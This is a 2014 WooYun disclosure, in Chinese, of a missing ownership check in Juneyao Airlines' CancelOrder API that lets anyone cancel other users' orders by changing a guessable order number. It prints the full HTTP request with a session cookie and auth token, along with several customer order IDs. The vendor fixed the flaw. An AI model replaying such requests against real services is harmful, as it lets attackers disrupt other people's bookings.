当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065783

漏洞标题:吉祥航空官网任意订单取消漏洞

相关厂商:juneyaoair.com

漏洞作者: papaver

提交时间:2014-06-22 01:23

修复时间:2014-07-24 22:49

公开时间:2014-07-24 22:49

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-22: 细节已通知厂商并且等待厂商处理中
2014-06-24: 厂商已经确认,细节仅向厂商公开
2014-07-04: 细节向核心白帽子及相关领域专家公开
2014-07-14: 细节向普通白帽子公开
2014-07-24: 细节向实习白帽子公开
2014-07-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

介个,其实跟商城那个一样,没有对所属人及权限做判断。
要是有人不停的取消你们的订单,这个,影响真的很大啊

详细说明:

POST /UnitOrderWebAPI/Order/CancelOrder?random=0.0397423033883767 HTTP/1.1
Host: www.juneyaoair.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.juneyaoair.com/pages/members/memOrder.aspx
Content-Length: 25
Cookie: __utma=227299846.1426385805.1403358766.1403358766.1403358766.1; __utmb=227299846.31.10.1403358766; __utmc=227299846; __utmz=227299846.1403358766.1.1.utmcsr=mall.juneyaoair.com|utmccn=(referral)|utmcmd=referral|utmcct=/member/receiverProductInfoList.jspx; ASP.NET_SessionId=yory1mnrtxuaqqaj5303g1ls; .ASPXAUTH=EFDD89D38909A0C247176E0B2A1F7C458BE852A47E86CE4A20F6CF9FA2E6832720B18268AB0B9132BE27784D70BC7519A46F7E34338E8347B81C0C8E0FF5825B5DCB1BF4555E2050CBA9036D6E6C160DF4FDA872221D0ECB14510D4574FB7D1CBF110E2D56A6561E6D02386B0F1155C5D12AEBEB70D5F291237CBB32BA913A0024141A4568BFF7312A7417B64A5203F41AB37D2B776AADC39163DF60A8CAB8CA
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
OrderNo=ORD14062100954542


修改这个OrderNo 为其他id即可,严重的是,这个id是可以遍历的,贴几个id号吧,联系下的
ORD14062100954526
ORD14062100954563
ORD14062100954542

漏洞证明:

就不贴图了,贴出来也是限制状态取消的,没什么实际意义。

修复方案:

限制,,看看是谁在做谁的操作啊,

版权声明:转载请注明来源 papaver@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-06-24 08:54

厂商回复:

漏洞已经修复,感谢papaver的辛勤工作

最新状态:

2014-07-24:已修复完成

2014-07-24:修复完成


漏洞评价:

评论